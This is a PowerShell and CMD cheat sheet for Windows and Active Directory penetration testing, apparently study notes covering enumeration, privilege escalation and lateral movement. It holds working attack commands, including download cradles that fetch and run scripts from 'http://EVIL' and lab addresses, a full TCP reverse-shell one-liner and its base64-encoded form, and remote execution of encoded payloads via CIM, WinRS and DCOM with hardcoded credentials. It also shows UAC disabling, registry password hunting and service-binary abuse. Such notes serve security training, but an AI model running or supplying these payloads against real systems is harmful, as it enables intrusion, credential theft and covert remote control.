CheatSheet

PowerShell CheatSheet

Enumeration and privilege escalation techniques for PowerShell.

PowerShell / CMD (All Commands)

Helpful Links:

Windows Workgroup (Standalone PC)

Username

whoami

Username & SID

whoami /user

Group Membership

whoami /groups

Other Users

Get-LocalUser

Other Groups

Get-LocalGroup

Get Group Membership

Get-LocalGroupMember <group_name>

Adding a User to a Group

Add-LocalGroupMember -Group "GroupName" -Member "UserName"
net localgroup administrators alex /add

Adding a Domain User to a Local Group

Add-LocalGroupMember -Group "Remote Desktop Users" -Member "CONTOSO\DomainUser"

Adding Multiple Users to a Local Group

Add-LocalGroupMember -Group "Users" -Member "User1", "User2", "CONTOSO\DomainGroup"

Changing User’s Password

net user alex P@ssword1

Obtaining Integrity Level of Current User

Import-Module NtObjectManager
Get-NtTokenIntegrityLevel

Hostname

hostname

System

systeminfo

Grabbing Security Patch Information

Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

Listing Shares

ls \\dc01.corp.com\sysvol\corp.com
dir \\dc01.corp.com\sysvol\corp.com

Simple IP Lookup

nslookup <FQDN>

Interfaces

ipconfig /all

Routing Information

route print

Active Network Connections

netstat -ano

Test-NetConnection

Test-NetConnection -Port 443 192.168.0.1

Scripting with Test-NetConnection

foreach ($port in 1..1014) {If (($a=Test-NetConnection 192.168.50.151 -Port $port -WaringAction SilentlyContinue).tcpTestSucceeded -eq $true){ "Tcp port $port is open"}}

Scripting Port Scan with TcpClient

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.136.151", $_)) "TCP port $_ is open"} 2>$null

Gathering Network Information from Local Store

@echo off
    echo Getting network configuration from local machine:
    wmic nicconfig where "IPEnabled=true" get IPAddress,DNSHostName
    pause

Show Firewall Profile

Get-NetFirewallProfile

Show State (Deprecated)

netsh firewall show state

Show Configuration (Deprecated)

netsh firewall show config

Running NetSH (Port Forward)

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215

Confirm the Port Forward is Stored (Show Port Forward Table)

netsh interface portproxy show all
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.50.64   2222        10.4.50.215     22

Open Port 2222 on **MULTISERVER03 (poke a hole in the firewall)**

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

Delete the Firewall Rule

netsh advfirewall firewall delete rule name="port_forward_ssh_2222"

Delete the Port Forward

netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64

Enumerating AV Software

Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntivirusProduct"
Get-Service | Where-Object { $_.DisplayName -like "*McAfee*" -or $_.DisplayName -like "*Symantec*" -or $_.DisplayName -like "*Kaspersky*" -or $_.DisplayName -like "*Bitdefender*" -or $_.DisplayName -like "*Avast*" -or $_.DisplayName -like "*Malwarebytes*" -or $_.DisplayName -like "*TotalAV*" -or $_.DisplayName -like "*Avira*" -or $_.DisplayName -like "*Trend*" -or $_.DisplayName -like "*AVG*" -or $_.DisplayName -like "*Surfshark*" -or $_.DisplayName -like "*Defender*" -or $_.DisplayName -like "*Antivirus*" -or $_.DisplayName -like "*Norton*" -or $_.DisplayName -like "*Intego*" -or $_.DisplayName -like "*Sophos*" -or $_.DisplayName -like "*ESET*" -or $_.DisplayName -like "*Webroot*" -or $_.DisplayName -like "*Aura*" -or $_.DisplayName -like "*MacKeeper*" -or $_.DisplayName -like "*F-Secure*" -or $_.DisplayName -like "*Panda*"}

Identifying MS Defender AV Status

Get-MpComputerStatus

Identifying if Defender AV is Enabled

Get-MpComputerStatus | Select-Object AntivirusEnabled

Net View Script

@echo off
    echo Listing shares on local network...
    net view
    echo.
    echo Listing shares on a specific server (e.g., \\SERVERNAME):
    net view \\SERVERNAME
    pause

Query Registry for 32bit Applications

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname,installlocation
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i "DisplayName InstallLocation"

Query Registry from 64bit Applications

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname,installlocationclear
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i "DisplayName InstallLocation"

Finding Location of Application

where <application>

Opening up Administrator Powershell Window from Command Line

start-process powershell -Verb RunAs

Running Processes

Get-Process
tasklist
wmic process list full
wmic process get name,processid,Commandline

Grabbing File Path to Binary of Specific Process

(Get-Process -Name "FireFox").Path

Filter for Specific Process

tasklist /fi "imagename eq notepad.exe"

Live Updating (refreshing list)

tasklist /v
wmic process get name,processid,workingsetsize

Getting List of All Services

Get-Service
Get-CimInstance

Example of Searching for Background Services

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

Getting Information About a Particular Service

Get-CimInstance -ClassName win32_service | Select Name, StartMode, StartName | Where-Object {$_.Name -like 'ApacheHTTPServer'}

List Only Active Services

sc query
sc query type= service
net start

List Only Inactive Services

sc query state= inactive

Query a Specific Service

sc query <service_name>

Display Extended Information About Services

sc queryEx

Display Driver Information

sc query type= driver

Query Services on Remote Server

sc \\<servername> query <servicename> <options>

Starting a Service

Start-Process -FilePath "notepad.exe" -Force

Stopping a Service

Stop-Service "serviceName"
Stop-Process -Name "notepad" -Force
Stop-Process -Id 1234 -Force

Restarting a Service

Restart-Service <servicename> -Force

Creating a Service

sc.exe create "Scheduler" binpath= "C:\Users\oscp_\OneDrive\Desktop\scheduler.exe"

More Effective Way of Discovering Unquoted Service Paths

wmic service get name,pathname |  findstr /i /v "C:\Windows"

Gathering Permissions:

icacls "C:\xampp\apache\bin\httpd.exe"
Get-Acl -Path file.txt

Disable UAC

C:\users\alex\SigmaPotato.exe "Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0"

Enumerating Safe DLL Search Mode

Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name SafeDllSearchMode

Enumerating Scheduled Tasks

Get-ScheduledTask
schtasks /query /fo LIST /v

Prints Out Just the Task Name and the Path to the Binary

Get-ScheduledTask | Select-Object TaskName, @{Name='ExecutablePath'; Expression={$_.Actions.Execute}}

Showing Information About Specific Task

Get-ScheduledTask -TaskName "MyDailyBackupTask"
schtasks /Query /TN "OneDrive Standalone Update Task-S-1-5-21-697536651-98314752-489439087-1002" /FO LIST /V

Check Powershell Command History

Get-History

Get Path to History File from PSReadline

(Get-PSReadlineOption).HistorySavePath
C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Preventing the PSReadline from Recording

Set-PSReadlineOption -HistorySaveStyle SaveNothing

Searching for `txt` or `ini` Files in Apache

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Searching for Documents and Text Files

Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Query Registry for “password”

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Query WinLogon Registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Query SNMP Registry

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Query Putty Registry

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Obtain Account Policy

net accounts

Creating a Credential Object (Storing Credentials as Secure String)

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

Creating a Common Information Model (CIM) to Pop Calc Remotely

$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options 
$command = 'calc';

Invoking CIM Object

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

Normal Download Cradle

IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

Invoking Web Request

iwr -uri http://192.168.45.197/winPEASx64.exe -Outfile winPEAS.exe

Powershell 3.0+

IEX (iwr 'http://10.10.103.147:8000/powercat.ps1')

Hidden IE Com Object

$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

Msxm12.XMLHTTP COM object

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

WinHttp COM object (not proxy aware!)

$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText

Using Bits Transfer - (touches disk)

Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

DNS TXT approach from PowerBreach

IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

From SubTree

<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex

Sending Data Via HTTP

chisel server --port 8080 --reverse

Sending Post Data via cURL

curl --data @/tmp/output.txt http://192..168.45.197:8080/

Accessing Web Server (Active Directory Environment)

iwr -UseDefaultCredentials http://web04

Example of Executing Remote Command

winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"

Invoking CIM Object

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$command = 'calc';
$Command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

WinRS (WinRM) with Encoded Powershell Payload (From Windows Machine)

winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

Using New-PSSesion Cmdlet

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName 192.168.50.73 -Credential $credential
Enter-PSSession 1

Create DCOM Instance

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

Powershell One-Liner

$client = New-Object System.Net.Sockets.TCPClient('192.168.45.212',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Encoding Powershell One-Liner to Execute in Web Shell

pwsh
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.197",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
...
powershell -ep bypass -nop -enc "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0...."

Powercat (Powershell Version of NetCat):

/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1

Pull Down File to Server

iwr -uri http://192.168.48.3/PowerUp.ps1 -Outfile PowerUp.ps1

Bypass Execution Policy

powershell -ep bypass

Run PowerUp

. .\PowerUp.ps1
Import Module .\PowerUp.ps1

Enable All Checks

Invoke-AllChecks

Enumerate Vulnerable Service Files

Get-ModifiableServiceFile
ServiceName                     : mysql
Path                            : C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql
ModifiableFile                  : C:\xampp\mysql\bin\mysqld.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'mysql'
CanRestart                      : False

Using Abuse Function to Auto-Pwn Service File

Install-ServiceBinary -Name 'mysql'

Enumerating Unquoted Service Paths

Get-UnquotedService

Auto Abuse Function for Attacking Unquoted Path

Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

Active Directory Specific

Username & SID

whoami /user

Current User Principal Name

whoami /upn

Current User Fully Qualified Distinguished Name (FQDN)

whoami /fqdn

Current User Logon ID

whoami /logonid

Current User SID

whoami /user

Domain Users

net user /domain

Query Specific Domain User

net user jeff /domain

Domain Groups

net group /domain

Query Specific Domain Group

net group "Sales Department" /domain

Finding the Primary Domain Controller

$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"
$LDAP

Grabbing All Properties of Users in Domain

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }

    Write-Host "-------------------------------"
}

Grabbing the `MemberOf` Property of Each User

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop.memberof
    }

    Write-Host "-------------------------------"
}

Grabbing All Properties for a Specific User

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="name=jeff"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }

    Write-Host "-------------------------------"
}

Adapted Script to Accept Command Line Arguments

function LDAPSearch {
    param (
        [string]$LDAPQuery
    )

    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName

    $DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")

    $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)

    return $DirectorySearcher.FindAll()

}
Import-Module .\function.ps1
LDAPSearch -LDAPQuery "(samAccountType=805306368)"
LDAPSearch -LDAPQuery "(objectclass=group)"
$sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Sales Department))"
$sales.properties.member
$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Domain Admin*))"
$group.properties.member

Running Loop Over Script (Above) to Grab Groups and their Members

foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {
$group.properties | select {$_.cn}, {$_.member}
}

Check if SPN is Already Set On User

Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName

Force Set SPN on Account

Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}

Confirm Silver Ticket is Loaded in Memory

klist

PowerView

Importing Module

Import-Module .\PowerView.ps1

Get Basic Information Regarding Domain

Get-NetDomain

List of Users in Domain

Get-NetUser

Filter Users by Name

Get-NetUser | select cn

Discover Whether Current User has Admin Privileges on Any Computers

Find-LocalAdminAccess

Finding Users that haven’t Logged in in a while

Get-NetUser | select cn,pwdlastset,lastlogon

Finding Users that are Logged in with a Session

Get-NetSession -ComputerName files04 -Verbose

Get Groups

Get-NetGroup | select cn

Enumerate Specific Group for Members

Get-NetGroup "Sales Department" | select member

Get System Information

Get-NetComputer

Filtering for OS and Hostname

Get-NetComputer | select operatingsystem,dnshostname

Filtering for Distinguished Name and Hostname

Get-NetComputer | select dnshostname,distinguishedname

Enumerate SPNs for Domain

Get-NetUser -SPN | select samaccountname,serviceprincipalname

Enumerate ACEs Applied to Current User

Get-ObjectAcl -Identity stephanie

Enumerate GenericAll rights for Specific Group

Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

Convert SID to Name

Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104

Find All Shares withing a Domain

Find-DomainShare

Find Shares Only Available to Us

Find-DomainShare -CheckShareAccess